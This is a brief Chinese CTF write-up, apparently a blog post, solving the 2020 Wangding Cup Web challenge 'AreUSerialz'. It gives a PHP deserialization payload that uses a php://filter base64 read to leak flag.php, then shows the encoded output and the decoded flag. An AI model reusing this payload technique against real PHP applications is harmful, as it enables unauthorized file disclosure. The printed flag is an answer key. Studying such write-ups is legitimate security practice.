【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz

【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz

http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48224380.cloudgame2.ichunqiu.com/

进入网址
【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz_第1张图片
PHP反序列化漏洞…

拿到
?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resource=/web/html/flag.php”;S:10:"\00*\00content";s:3:“aaa”;}

playload

直接在URL后面输入:
?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resource=/web/html/flag.php”;S:10:"\00*\00content";s:3:“aaa”;}

在这里插入图片描述

之后会出现:
[Result]:
PD9waHAKCiRmbGFnID0gImZsYWd7Y2I0MjYyNTctMTNkMC00NWVhLTkzMDEtYzRjMjAxMWUzYTc3fSI7Cg==
【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz_第2张图片
复制
PD9waHAKCiRmbGFnID0gImZsYWd7Y2I0MjYyNTctMTNkMC00NWVhLTkzMDEtYzRjMjAxMWUzYTc3fSI7Cg==

去BASE64加密解密网址:
https://base64.supfree.net/

粘贴–>BASE64解密
【2020年第二届“网鼎杯”网络安全大赛 青龙组】Web AreUSerialz_第3张图片

解密内容为:

flag{cb426257-13d0-45ea-9301-c4c2011e3a77}

你可能感兴趣的:(斜杆青年)